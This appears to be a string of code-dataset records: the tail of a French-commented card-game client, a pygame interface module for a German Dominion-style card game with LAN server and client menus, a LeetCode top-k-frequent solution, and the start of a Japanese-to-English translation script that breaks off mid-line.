user_input\n\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\n\t\t\t\t\t\t# Sélection de la carte bloquante\n\t\t\t\t\t\twhile True:\n\n\t\t\t\t\t\t\ti = 0\n\n\t\t\t\t\t\t\t# Rafraichissement de l'écran\n\t\t\t\t\t\t\tself.clear_terminal()\n\n\t\t\t\t\t\t\t# Affichage de notre Battle Zone\n\t\t\t\t\t\t\tprint(\"Joueur\", self.__player_id, \"(\" + str(self.__players[self.__player_id].get_life()) + \")\")\n\t\t\t\t\t\t\tfor card in self.__players[self.__player_id].get_board().get_battle_zone():\n\n\t\t\t\t\t\t\t\tif(card.is_tapped()):\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\tprint(\"(T)\" + card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\t\t\tprint(card.get_name() + \"(\" + str(i) + \")\")\n\n\t\t\t\t\t\t\t\ti = i + 1\n\n\t\t\t\t\t\t\t# Récupération de l'entrée utilisateur\n\t\t\t\t\t\t\tuser_input = self.input(0,self.__players[self.__player_id].battlezone_size()-1)\n\n\t\t\t\t\t\t\tif(user_input.isnumeric()):\n\n\t\t\t\t\t\t\t\tuser_input = int(user_input)\n\n\t\t\t\t\t\t\t\tif(user_input >= 0 and user_input < len(self.__players[self.__player_id].get_board().get_battle_zone())):\n\n\t\t\t\t\t\t\t\t\trequest[\"blocker\"] = user_input\n\n\t\t\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\t\tbreak\n\n\t\t\telif(user_input == SKIP_PHASE):\n\n\t\t\t\trequest = { \n\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\"type\" : \"SKIP_PHASE\"\n\t\t\t\t}\n\n\t\t\t\tbreak\n\n\t\t\telif(user_input == CONCEDE):\n\n\t\t\t\trequest = { \n\t\t\t\t\t\"player\" : self.__player_id,\n\t\t\t\t\t\"type\" : \"CONCEDE\"\n\t\t\t\t}\n\n\t\t\t\tbreak\t\t\t\t\n\n\t\t\telse:\n\n\t\t\t\tinput(\"Erreur lors de la saisie, appuyez sur Entrée pour revenir au menu\")\n\n\t\t#input(request)\n\n\t\treturn request\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tprint ('Interrupted')\n\t\tsys.exit(0)","sub_path":"code/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":26644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"361115630","text":"# Written by Laurenz Mädje\r\n\r\nimport pygame\r\nimport math\r\nimport os\r\nimport sys\r\nimport time\r\nimport threading\r\nimport 
socket\r\nimport cards\r\nimport player\r\nimport var\r\nimport net\r\n\r\n\r\nclass Menu:\r\n\r\n def __init__(self):\r\n\r\n var.hintergrund = pygame.image.load('res/background.jpg')\r\n var.hintergrund = pygame.transform.scale(var.hintergrund, (1366, 768))\r\n\r\n # Start UI Elemente\r\n self.buttonServer = Button((588, 350, 190, 58), 'Server')\r\n self.port = Label((518, 250, 100, 40), 'Port: ')\r\n self.portfield = TextField((638, 240, 160, 53))\r\n\r\n self.buttonClient = Button((588, 600, 190, 58), 'Client')\r\n self.port2 = Label((228, 500, 100, 40), 'Port: ')\r\n self.portfield2 = TextField((328, 490, 160, 53))\r\n self.host = Label((528, 500, 100, 40), 'Host: ')\r\n self.hostfield = TextField((638, 490, 500, 53))\r\n\r\n self.textbox = Textbox((103, 100, 1200, 100), 'Gib einen Port ein und wähle Server, um einen Server zu starten und auf einen Gegner zu warten! '\r\n 'newline Gib Port und IP eines Hosts ein und wähle Client, um dich mit dessen Server zu verinden!', 25)\r\n\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):\r\n pygame.quit()\r\n os._exit(0)\r\n\r\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\r\n return\r\n\r\n self.portfield.update(event)\r\n self.portfield2.update(event)\r\n self.hostfield.update(event)\r\n\r\n if self.buttonServer.update(event):\r\n var.type = 'server'\r\n var.connection = ('', self.portfield.getText())\r\n return\r\n\r\n elif self.buttonClient.update(event):\r\n var.type = 'client'\r\n var.connection = (self.hostfield.getText(), self.portfield2.getText())\r\n return\r\n\r\n var.screen.blit(var.hintergrund, (0,0))\r\n\r\n self.buttonServer.draw()\r\n self.portfield.draw()\r\n self.port.draw()\r\n self.buttonClient.draw()\r\n self.portfield2.draw()\r\n self.port2.draw()\r\n self.host.draw()\r\n self.hostfield.draw()\r\n self.textbox.draw()\r\n\r\n pygame.display.update()\r\n\r\n\r\nclass WaitScreen():\r\n\r\n def __init__(self):\r\n var.hintergrund = pygame.image.load('res/background.jpg')\r\n var.hintergrund = pygame.transform.scale(var.hintergrund, (1366, 768))\r\n \r\n self.endbutton = Button((600, 550, 200, 58), 'Beenden')\r\n\r\n text = 'Warte auf Mitspieler... newline Host: ' + socket.gethostname() + ' newline Port: ' + var.connection[1]\r\n\r\n self.textbox = Textbox((103, 150, 1200, 300), text, 30)\r\n\r\n while var.connect.stopped:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE) or self.endbutton.update(event):\r\n pygame.quit()\r\n var.connect.close()\r\n os._exit(0)\r\n\r\n var.screen.blit(var.hintergrund, (0,0))\r\n\r\n self.endbutton.draw()\r\n self.textbox.draw()\r\n\r\n pygame.display.update()\r\n\r\nclass Overlay:\r\n\r\n def __init__(self):\r\n self.infobox = Textbox((500, 150, 750, 100),'Wähle eine Karte. newline Drücke Spielen, um sie auszuspielen! 
newline Drücke Weiter, um in die Kaufphase zu gelangen', 25)\r\n\r\n if var.type == 'server':\r\n var.connect = net.Server(int(var.connection[1]))\r\n var.connect.start()\r\n WaitScreen()\r\n var.state = 'action'\r\n cards.createStacklist()\r\n cards.createStacks()\r\n var.connect.send('STACKLIST:' + ' '.join(stack for stack in cards.stacklist))\r\n elif var.type == 'client':\r\n var.connect = net.Client(var.connection[0], int(var.connection[1]))\r\n var.connect.start()\r\n var.state = 'enemy'\r\n self.infobox.setText('Dein Gegner ist am Zug!')\r\n else:\r\n var.connect = net.FakeConnect()\r\n cards.createStacklist()\r\n cards.createStacks()\r\n var.state = 'action'\r\n\r\n var.myplayer = player.Player()\r\n var.interface = None\r\n self.gameover = (False, None)\r\n var.myplayer.clear()\r\n self.handpos = []\r\n\r\n self.weiter = Button((1150, 350, 190, 58), 'Weiter')\r\n self.cardShower = CardShower(cards.Card('Abenteurer'), 'Gegner spielt')\r\n self.stocks = Stocks()\r\n self.board = Board()\r\n self.enemyboard = EnemyBoard()\r\n self.hand = Hand()\r\n self.enemyhand = Hand(enemy=True)\r\n var.hintergrund = pygame.image.load('res/background.jpg')\r\n var.hintergrund = pygame.transform.scale(var.hintergrund, (1366, 768))\r\n\r\n var.interface = HandSelector('single','Spielen', self.playPressed)\r\n\r\n def loop(self):\r\n while True:\r\n self._update()\r\n self._draw()\r\n\r\n # Sieg testen\r\n if var.type == 'server' and cards.gameOver():\r\n var.connect.send('OVER:' + str(var.myplayer.pointsInDeck()))\r\n\r\n if self.gameover[0]:\r\n return (var.myplayer.pointsInDeck(), self.gameover[1])\r\n\r\n def _update(self):\r\n\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):\r\n pygame.quit()\r\n var.connect.close()\r\n os._exit(0)\r\n\r\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\r\n self.yourTurn()\r\n\r\n if var.state in ['action', 'buy', 'playing']:\r\n if self.weiter.update(event) and var.state != 'playing':\r\n self.weiterPressed()\r\n\r\n if var.state in ['action', 'buy', 'playing', 'react']:\r\n if var.interface is not None:\r\n value = var.interface.update(event)\r\n\r\n if value is not None and (isinstance(var.interface, sys.modules['overlay'].HandSelector) or isinstance(var.interface, HandSelector)):\r\n self.handpos = value\r\n else:\r\n self.handpos = []\r\n\r\n # Connection\r\n var.connect.send('MY_HANDLEN:' + str(len(var.myplayer.hand)))\r\n var.connect.send('MY_NACHZIEHLEN:' + str(len(var.myplayer.nachzieh)))\r\n var.connect.send('MY_STATS:' + str(var.myplayer.actions) + ' ' + str(var.myplayer.buys) + ' ' + str(var.myplayer.money))\r\n var.connect.send('MY_ABLAGELEN:' + str(len(var.myplayer.ablage)))\r\n if len(var.myplayer.ablage) > 0: var.connect.send('MY_ABLAGECARD:' + str(var.myplayer.ablage[-1].name))\r\n else: var.connect.send('MY_ABLAGECARD:None')\r\n\r\n def _draw(self):\r\n\r\n var.screen.blit(var.hintergrund, (0,0))\r\n\r\n if var.state in ['action', 'buy', 'enemy', 'yourturn', 'playing', 'react']:\r\n if var.state != 'playing':\r\n self.weiter.draw()\r\n self.stocks.draw()\r\n self.board.draw()\r\n self.enemyboard.draw()\r\n self.infobox.draw()\r\n\r\n if var.interface is not None:\r\n var.interface.draw()\r\n\r\n self.hand.draw(selected=self.handpos)\r\n self.enemyhand.draw()\r\n\r\n self.cardShower.draw()\r\n\r\n pygame.display.update()\r\n\r\n def weiterPressed(self):\r\n if var.state == 'action':\r\n var.interface = BuySelector('Kaufen', 
self.buyPressed)\r\n self.infobox.setText('Wähle eine Karte aus dem Vorrat. newline Drücke Kaufen, um sie zu kaufen! newline Drücke Weiter, um den Gegner dranzulassen.')\r\n var.myplayer.playMoney()\r\n var.state = 'buy'\r\n elif var.state == 'buy':\r\n var.interface = HandSelector('single', 'Spielen', self.playPressed)\r\n self.infobox.setText('Dein Gegner ist am Zug!')\r\n var.connect.send('YOUR_TURN')\r\n var.myplayer.clear()\r\n var.state = 'enemy'\r\n\r\n def buyPressed(self, position):\r\n card = self.stocks.getCardOfPos(position)\r\n var.interface.reset()\r\n var.myplayer.buyCard(card)\r\n\r\n def playPressed(self, position):\r\n card = var.myplayer.hand[position[0]]\r\n var.interface.reset()\r\n card.play()\r\n\r\n def yourTurn(self):\r\n var.state = 'action'\r\n self.infobox.setText('Wähle eine Karte. newline Drücke Spielen, um sie auszuspielen! newline Drücke Weiter, um in die Kaufphase zu gelangen')\r\n\r\n def showCard(self, card, text):\r\n self.cardShower.setShow(card, text)\r\n self.cardShower.show()\r\n\r\n def end(self, enemypoints):\r\n self.gameover = True, int(enemypoints)\r\n\r\n\r\nclass End:\r\n\r\n def __init__(self, points):\r\n self.endbutton = Button((550, 550, 300, 58), 'Spiel beenden')\r\n if points[0] > points[1]:\r\n text = 'Du hast gewonnen! newline ' + str(points[0]) + ' Punkte zu ' + str(points[1]) + ' Punkte.'\r\n elif points[0] < points[1]:\r\n text = 'Du hast verloren! newline ' + str(points[0]) + ' Punkte zu ' + str(points[1]) + ' Punkte.'\r\n elif points[0] == points[1]:\r\n text = 'Gleichstand! newline ' + str(points[0]) + ' Punkte zu ' + str(points[1]) + ' Punkte.'\r\n self.textbox = Textbox((103, 100, 1200, 100), text, 30)\r\n\r\n\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE) or self.endbutton.update(event):\r\n pygame.quit()\r\n var.connect.close()\r\n os._exit(0)\r\n\r\n var.screen.fill((200,200,200))\r\n\r\n self.endbutton.draw()\r\n self.textbox.draw()\r\n\r\n pygame.display.update()\r\n\r\n\r\nclass Button:\r\n imgpath = ['res/button/button.png', 'res/button/hover.png', 'res/button/click.png']\r\n font = 'res/font.ttf'\r\n\r\n def __init__(self, rect, text):\r\n self.rect = pygame.Rect(rect)\r\n self.text = text\r\n\r\n self.visible = True\r\n self._setImg(0)\r\n self._setText(self.text)\r\n\r\n def _setImg(self, num):\r\n self.img = pygame.image.load(self.imgpath[num])\r\n self.img = pygame.transform.scale(self.img, (self.rect.width, self.rect.height))\r\n\r\n def _setText(self, text):\r\n font = pygame.font.Font(self.font, self.rect.h // 2)\r\n self.textimg = font.render(text, 1, (0, 0, 0))\r\n self.textpos = (self.rect[0] + int(self.rect[2] / 2 - font.size(self.text)[0] / 2),\r\n self.rect[1] + int(self.rect[3] / 2 - font.size(self.text)[1] / 2))\r\n\r\n def draw(self):\r\n if self.visible:\r\n var.screen.blit(self.img, self.rect)\r\n var.screen.blit(self.textimg, self.textpos)\r\n\r\n def update(self, event):\r\n if self.rect.collidepoint(pygame.mouse.get_pos()) and self.visible:\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n self._setImg(2)\r\n elif event.type == pygame.MOUSEBUTTONUP:\r\n self._setImg(0)\r\n return True\r\n else:\r\n self._setImg(1)\r\n else:\r\n self._setImg(0)\r\n return False\r\n\r\n\r\nclass Textbox:\r\n\r\n def __init__(self, rect, text, size):\r\n self.text = text\r\n self.orisize = size\r\n self.size = self.orisize\r\n self.font = pygame.font.Font('res/font.ttf', size)\r\n self.rect = pygame.Rect(rect)\r\n 
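# Editor's note: draw() re-renders the text each frame and keeps shrinking self.size until the\r\n        # wrapped text fits self.rect; the literal token 'newline' in self.text forces a manual line break.\r\n        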
self.visible = True\r\n\r\n def setText(self, text):\r\n self.size = self.orisize\r\n self.text = text\r\n\r\n def draw(self):\r\n self.font = pygame.font.Font('res/font.ttf', self.orisize)\r\n end = False\r\n while not end:\r\n # var.screen.fill(var.hintergrundcolor, rect=self.rect)\r\n end = True\r\n text = self.text.split()\r\n bonusX = 0\r\n extraBonusY = 0\r\n zeile = 0\r\n\r\n self.font = pygame.font.Font('res/font.ttf', self.size)\r\n aktuelle_zeile = []\r\n for word in text:\r\n _word = self.font.render(word + ' ', 1, (0, 0, 0))\r\n\r\n if word == 'newline':\r\n self._draw(aktuelle_zeile)\r\n aktuelle_zeile = []\r\n zeile += 1\r\n extraBonusY += 13\r\n bonusX = 0\r\n else:\r\n if bonusX + _word.get_rect().w + 10 > self.rect.w:\r\n self._draw(aktuelle_zeile)\r\n aktuelle_zeile = []\r\n zeile += 1\r\n bonusX = 0\r\n\r\n x = 10 + self.rect.x + bonusX\r\n y = 10 + self.rect.y + zeile * self.size + extraBonusY\r\n\r\n bonusX += _word.get_rect().w\r\n\r\n if self.size * (zeile + 1) + extraBonusY + 10 >= self.rect.h:\r\n self.visible = False\r\n self.size -= 1\r\n end = False\r\n break\r\n\r\n elif word != 'newline':\r\n aktuelle_zeile.append((_word, x, y))\r\n\r\n self.visible = True\r\n\r\n self._draw(aktuelle_zeile)\r\n\r\n\r\n\r\n def _draw(self, aktuelle_zeile):\r\n if self.visible:\r\n offset = 0\r\n for set in aktuelle_zeile:\r\n offset += set[0].get_rect().w\r\n offset = (self.rect.w - offset) // 2\r\n\r\n for set in aktuelle_zeile:\r\n var.screen.blit(set[0], (set[1] + offset, set[2]))\r\n\r\n\r\nclass TextField:\r\n font = 'res/font.ttf'\r\n\r\n # Konstruktor: surface = worauf wird das TextField gezeichnet, rect = Abmaße\r\n def __init__(self, rect):\r\n self.rect = pygame.Rect(rect)\r\n self.font = pygame.font.Font(self.font, self.rect.h - 10)\r\n self.text = ''\r\n self.writing = False\r\n\r\n def getText(self):\r\n return self.text\r\n\r\n # Zeichnet das Textfeld\r\n def draw(self):\r\n # var.screen.fill((200,200,200), rect=self.rect)\r\n text = self.font.render(self.text, 1, (0,0,0))\r\n var.screen.blit(text, (self.rect.x + 7, self.rect.y + 7))\r\n var.screen.fill((0, 0, 0), rect=(self.rect.x, self.rect.y + self.rect.h + 10, self.rect.w - 20, 4))\r\n if self.writing:\r\n var.screen.fill((0, 0, 0), rect=[self.rect.x + self.font.size(self.text)[0], self.rect.y, 4, self.rect.h + 7])\r\n\r\n # Muss mit event aufgerufen werden, damit das Textfeld funktioniert\r\n def update(self, event):\r\n\r\n if self.rect.collidepoint(pygame.mouse.get_pos()) and event.type == pygame.MOUSEBUTTONDOWN:\r\n self.writing = True\r\n elif not self.rect.collidepoint(pygame.mouse.get_pos()) and event.type == pygame.MOUSEBUTTONDOWN:\r\n self.writing = False\r\n\r\n if self.writing:\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_BACKSPACE:\r\n self.text = self.text[:-1]\r\n elif event.key <= 127 and self.font.size(self.text)[0] <= self.rect.w - 40:\r\n self.text += event.unicode\r\n self.draw()\r\n\r\n\r\nclass Label:\r\n font = 'res/font.ttf'\r\n\r\n def __init__(self, rect, text):\r\n self.rect = pygame.Rect(rect)\r\n self.text = text\r\n\r\n self.visible = True\r\n self.setText(self.text)\r\n\r\n def setText(self, text):\r\n self.text = text\r\n font = pygame.font.Font(self.font, self.rect.height)\r\n self.img = font.render(self.text, 1, (0, 0, 0))\r\n\r\n def draw(self):\r\n var.screen.blit(self.img, self.rect)\r\n\r\n\r\nclass Stack:\r\n\r\n def __init__(self, pos, card):\r\n self.card = card\r\n self.pos = pos\r\n self.label = Label((27 + pos[0], 120 + pos[1], 20, 20), '')\r\n 
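# setCard() loads the card face from card.path and scales it to the 80x120 stack slot\r\n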
self.setCard(card)\r\n\r\n def setCard(self, card):\r\n self.card = card\r\n self.img = pygame.image.load(self.card.path)\r\n self.img = pygame.transform.scale(self.img, (80, 120))\r\n\r\n def _drawCard(self):\r\n var.screen.blit(self.img, (self.pos[0], self.pos[1]))\r\n\r\n def _drawCounter(self, count):\r\n self.label.setText('x' + str(count))\r\n self.label.draw()\r\n\r\n def draw(self, count):\r\n if count > 0:\r\n self._drawCard()\r\n self._drawCounter(count)\r\n\r\n\r\nclass Stocks:\r\n\r\n def __init__(self):\r\n self.stacklist = (('Kupfer', 'Silber', 'Gold'), ('Anwesen', 'Herzogtum', 'Provinz', 'Fluch'), cards.stacklist[0:4], cards.stacklist[4:8], cards.stacklist[8:10])\r\n self.stacks = [Stack((20 + 90 * x, 10 + 150 * y), cards.Card(self.stacklist[y][x])) for y, row in enumerate(self.stacklist) for x, card in enumerate(row)]\r\n\r\n def getCardOfPos(self, position):\r\n return cards.Card(self.stacklist[position[1]][position[0]])\r\n\r\n def draw(self):\r\n for stack in self.stacks:\r\n stack.draw(cards.stacks[stack.card.name])\r\n\r\n\r\nclass CardShower:\r\n\r\n def __init__(self, card, text):\r\n self.card = card\r\n self.label = Label((790, 180, 100, 30), text)\r\n self.setShow(card, text)\r\n self.visible = False\r\n\r\n def setShow(self, card, text):\r\n self.card = card\r\n self.img = pygame.image.load(card.path)\r\n self.img = pygame.transform.scale(self.img, (200,300))\r\n self.label.setText(text)\r\n\r\n def hide(self):\r\n self.visible = False\r\n\r\n def show(self):\r\n self.visible = True\r\n Waitor(1, self.hide)\r\n\r\n def showUntimed(self):\r\n self.visible = True\r\n\r\n def draw(self):\r\n if self.visible:\r\n var.screen.fill((170,170,170), rect=(763, 160, 250, 395))\r\n self.label.draw()\r\n var.screen.blit(self.img, (790, 230))\r\n\r\n\r\nclass Board:\r\n\r\n def __init__(self):\r\n self.backside = pygame.image.load('res/karten/rueckseite.png')\r\n self.rightcounter = Label((1300, 700, 30, 30), '')\r\n self.leftcounter = Label((500, 700, 30, 30), '')\r\n self.aktionen = Label((400, 650, 100, 20), 'Aktionen: 1')\r\n self.kaeufe = Label((400, 680, 100, 20), 'Käufe: 1')\r\n self.geld = Label((400, 710, 100, 20), 'Geld: 0')\r\n\r\n def draw(self):\r\n if (len(var.myplayer.nachzieh) > 0):\r\n var.screen.blit(self.backside, (550, 565))\r\n text = str(len(var.myplayer.nachzieh)) + ' x'\r\n self.leftcounter.setText(text)\r\n self.leftcounter.draw()\r\n\r\n if(len(var.myplayer.ablage) > 0):\r\n img = pygame.image.load(var.myplayer.ablage[-1].path)\r\n var.screen.blit(img, (1150, 555))\r\n text = 'x' + str(len(var.myplayer.ablage))\r\n self.rightcounter.setText(text)\r\n self.rightcounter.draw()\r\n\r\n self.aktionen.setText('Aktionen: ' + str(var.myplayer.actions))\r\n self.kaeufe.setText('Käufe: ' + str(var.myplayer.buys))\r\n self.geld.setText('Geld: ' + str(var.myplayer.money))\r\n self.aktionen.draw()\r\n self.kaeufe.draw()\r\n self.geld.draw()\r\n\r\n for i, card in enumerate(var.myplayer.auslage):\r\n img = pygame.image.load(card.path)\r\n var.screen.blit(img, (550 + i * 50, 300))\r\n\r\n\r\nclass EnemyBoard:\r\n\r\n def __init__(self):\r\n self.backside = pygame.image.load('res/karten/rueckseite.png')\r\n self.rightcounter = Label((1300, 50, 30, 30), '')\r\n self.leftcounter = Label((500, 50, 30, 30), '')\r\n self.aktionen = Label((400, 0, 100, 20), 'Aktionen: 1')\r\n self.kaeufe = Label((400, 30, 100, 20), 'Käufe: 1')\r\n self.geld = Label((400, 60, 100, 20), 'Geld: 0')\r\n\r\n def draw(self):\r\n if (var.enemynachziehlen > 0):\r\n var.screen.blit(self.backside, 
(550, -100))\r\n text = str(var.enemynachziehlen) + ' x'\r\n self.leftcounter.setText(text)\r\n self.leftcounter.draw()\r\n\r\n if (var.enemyablagelen > 0) and var.enemyablagecard is not None:\r\n img = pygame.image.load(var.enemyablagecard.path)\r\n var.screen.blit(img, (1150, -100))\r\n text = 'x' + str(var.enemyablagelen)\r\n self.rightcounter.setText(text)\r\n self.rightcounter.draw()\r\n\r\n self.aktionen.setText('Aktionen: ' + str(var.enemystats[0]))\r\n self.kaeufe.setText('Käufe: ' + str(var.enemystats[1]))\r\n self.geld.setText('Geld: ' + str(var.enemystats[2]))\r\n self.aktionen.draw()\r\n self.kaeufe.draw()\r\n self.geld.draw()\r\n\r\n\r\nclass Hand:\r\n\r\n def __init__(self, enemy=False):\r\n self.enemy = enemy\r\n if self.enemy:\r\n self.location = (850, -170)\r\n else:\r\n self.location = (850, 650)\r\n self.rahmen = pygame.image.load('res/karten/rahmen.png')\r\n\r\n def draw(self, selected=()):\r\n places = []\r\n if self.enemy:\r\n hand = [None] * var.enemyhandlen\r\n else:\r\n hand = var.myplayer.hand\r\n\r\n if len(hand) == 0:\r\n return\r\n elif len(hand) == 1:\r\n if self.enemy:\r\n img = pygame.image.load('res/karten/rueckseite.png')\r\n places = [(img, 850, -100, 0)]\r\n else:\r\n img = pygame.image.load(hand[0].path)\r\n places = [(img, 850, 560, 0)]\r\n else:\r\n for i, card in enumerate(hand):\r\n rot = + 35 - (70 * i) // (len(hand) - 1)\r\n if self.enemy:\r\n img = pygame.image.load('res/karten/rueckseite.png')\r\n rot *= -1\r\n else:\r\n img = pygame.image.load(card.path)\r\n\r\n rotimg = pygame.transform.rotate(img, rot)\r\n x = - 100 + (200 * i) // (len(hand) - 1)\r\n y = math.sqrt(150 ** 2 - x ** 2) // 2\r\n if self.enemy:\r\n y *= -1\r\n location = rotimg.get_rect(center=img.get_rect().center).move(x + self.location[0], self.location[1] - y)\r\n set = (rotimg, location[0], location[1], rot)\r\n places.append(set)\r\n\r\n for i,set in enumerate(places):\r\n var.screen.blit(set[0], (set[1], set[2]))\r\n\r\n if selected != [] and i in selected:\r\n rahmen = pygame.transform.rotate(self.rahmen, places[i][3])\r\n var.screen.blit(rahmen, (places[i][1], places[i][2]))\r\n\r\n\r\nclass HandSelector:\r\n\r\n def __init__(self, type, text, callback):\r\n self.type = type\r\n self.positions = []\r\n self.callback = callback\r\n self.button = Button((1150, 440, 190, 58), text)\r\n self.places = []\r\n\r\n def reset(self):\r\n self.positions = []\r\n\r\n def update(self, event):\r\n\r\n places = []\r\n if len(var.myplayer.hand) == 1:\r\n places = [(var.myplayer.hand[0], 0, 850, 560)]\r\n else:\r\n for i, card in enumerate(var.myplayer.hand):\r\n rot = 35 - (70 * i) // (len(var.myplayer.hand) - 1)\r\n img = pygame.image.load('res/karten/mask.png')\r\n rotimg = pygame.transform.rotate(img, rot)\r\n x = - 100 + (200 * i) // (len(var.myplayer.hand) - 1)\r\n y = math.sqrt(150 ** 2 - x ** 2) // 2\r\n location = rotimg.get_rect(center=img.get_rect().center).move(x + 850, 650 - y)\r\n set = (rotimg, location[0], location[1], rot)\r\n places.append(set)\r\n self.places = places\r\n\r\n position = None\r\n\r\n for i, set in enumerate(places):\r\n rect = set[0].get_rect().move(set[1], set[2])\r\n pixel = [pygame.mouse.get_pos()[0] - set[1], pygame.mouse.get_pos()[1] - set[2]]\r\n if event.type == pygame.MOUSEBUTTONUP and rect.collidepoint(pygame.mouse.get_pos()) and set[0].get_at(pixel) == (255,255,255, 255):\r\n if self.type == 'single':\r\n self.positions = [i]\r\n elif self.type == 'multiple':\r\n position = i\r\n\r\n if self.type == 'multiple':\r\n if position in 
self.positions:\r\n self.positions.remove(position)\r\n elif position is not None:\r\n self.positions.append(position)\r\n\r\n if self.button.update(event) and self.positions != []:\r\n self.callback(self.positions)\r\n\r\n return self.positions\r\n\r\n def draw(self):\r\n self.button.draw()\r\n\r\n\r\nclass BuySelector:\r\n\r\n def __init__(self, text, callback):\r\n self.position = None\r\n self.callback = callback\r\n self.button = Button((1150, 440, 190, 58), text)\r\n self.img = pygame.image.load('res/karten/rahmen.png')\r\n self.img = pygame.transform.scale(self.img, (80, 120))\r\n\r\n def reset(self):\r\n self.position = None\r\n\r\n def update(self, event):\r\n for x in range(4):\r\n for y in range(5):\r\n rect = pygame.Rect([20 + x * 90, 10 + 150 * y, 80, 120])\r\n if rect.collidepoint(pygame.mouse.get_pos()) and event.type == pygame.MOUSEBUTTONUP and not (x,y) in [(3,0), (2,4), (3,4)] and cards.stacks[var.overlay.stocks.getCardOfPos((x,y)).name] > 0:\r\n self.position = x,y\r\n if self.button.update(event) and self.position is not None:\r\n self.callback(self.position)\r\n\r\n def draw(self):\r\n self.button.draw()\r\n if self.position is not None:\r\n var.screen.blit(self.img, [20 + self.position[0] * 90, 10 + 150 * self.position[1], 80, 120])\r\n\r\n\r\nclass TwoOptionsSelector:\r\n\r\n def __init__(self, text, options, callback, pos=(790, 180)):\r\n self.pos = pos\r\n self.callback = callback\r\n self.label = Label((pos[0], pos[1], 250, 20), text)\r\n self.option1 = Button((pos[0], pos[1] + 50, 120, 40), options[0])\r\n self.option2 = Button((pos[0] + 130, pos[1] + 50, 120, 40), options[1])\r\n\r\n def update(self, event):\r\n if self.option1.update(event):\r\n self.callback(True)\r\n elif self.option2.update(event):\r\n self.callback(False)\r\n\r\n def draw(self):\r\n var.screen.fill((170, 170, 170), rect=(self.pos[0] - 27, self.pos[1]-20, 300, 125))\r\n self.label.draw()\r\n self.option1.draw()\r\n self.option2.draw()\r\n\r\n\r\nclass Waitor(threading.Thread):\r\n def __init__(self, time, callback):\r\n threading.Thread.__init__(self)\r\n self.time = time\r\n self.callback = callback\r\n self.start()\r\n\r\n def run(self):\r\n time.sleep(self.time)\r\n self.callback()\r\n\r\ndef main():\r\n pygame.init()\r\n pygame.display.set_caption('Dominion 2.0')\r\n pygame.display.set_icon(pygame.image.load('res/logo.png'))\r\n var.screen = pygame.display.set_mode((1366, 768))\r\n\r\n Menu()\r\n var.overlay = Overlay()\r\n points = var.overlay.loop()\r\n End(points)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"overlay.pyw","file_name":"overlay.pyw","file_ext":"pyw","file_size_in_byte":27201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"139995196","text":"class Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n #22.02 0509\n d={}\n for c in nums:\n d[c]=d.get(c,0)+1\n cnt=sorted(d.values())[-k:]#前k出现的次数\n return [i for i in d if d[i] in cnt ] \n \n'''给定一个非空的整数数组,返回其中出现频率前 k 高的元素。\n\n示例 1:\n\n输入: nums = [1,1,1,2,2,3], k = 2\n输出: [1,2]\n示例 2:\n\n输入: nums = [1], k = 1\n输出: [1]\n说明:'''","sub_path":"leetcode_solution/leetcode类别/4堆median/中等/347 前 K 个高频元素.py","file_name":"347 前 K 个高频元素.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"113718805","text":"import os\nimport json\nimport random\nimport re\n#import googletrans\nfrom time import sleep\nfrom configparser import ConfigParser\nimport 
translate\nfrom html import unescape\n\n#translator = googletrans.Translator(service_urls=[\"translate.googleapis.com\"])\n\n\ndef translate_text(text: str):\n \"\"\"\n Translates jp text into en text and returns it as a string\n\n Args:\n text (str): jp text to translate\n\n Returns:\n [type]: en translated text\n\n Raises:\n Exception: if failed to encode or translate text\n \"\"\"\n try:\n # Contains cjk?\n if not re.search(u\"[\\u3040-\\u30ff\\u3400-\\u4dbf\\u4e00-\\u9fff\\uf900-\\ufaff\\uff66-\\uff9f]\", text):\n raise ValueError(\"no cjk\")\n #translated = translator.translate(text, \"en\", \"ja\").text\n translated = unescape(translator.translate(text))\n # Check if cp932 encodable\n translated.encode(\"cp932\")\n return translated\n except Exception as e:\n print(e)\n print(f\"Failed to translate {text}\")\n return text\n\n\ndef file_exists(file: str) -> bool:\n \"\"\"\n Checks if file exists\n\n Args:\n file (str): location of file to check in current directory\n\n Returns:\n [bool]: if exists\n \"\"\"\n return os.path.isfile(file)\n\n\ndef machine_translate_list(data: dict):\n new_data = {}\n for file in data:\n new_data[file] = []\n for i, string in enumerate(data[file], start=1):\n translated = translate_text(string)\n sleep_time = random.uniform(4, 8)\n new_data[file].append(translated)\n print(f\"File: {file}, Old: {repr(string)}, New: {repr(translated)}, Done {i}/{len(data[file])}, Sleeping for {round(sleep_time, 2)}s\")\n sleep(sleep_time)\n return new_data\n\n\ndef machine_translate_single(file_name: str, data: dict):\n new_data = {}\n for i, file in enumerate(data):\n translated = translate_text(data[file])\n sleep_time = random.uniform(4, 8)\n new_data[file] = translated\n print(f\"File: {file_name}, Old: {repr(data[file])}, New: {repr(translated)}, Done {i}/{len(data)}, Sleeping for {round(sleep_time, 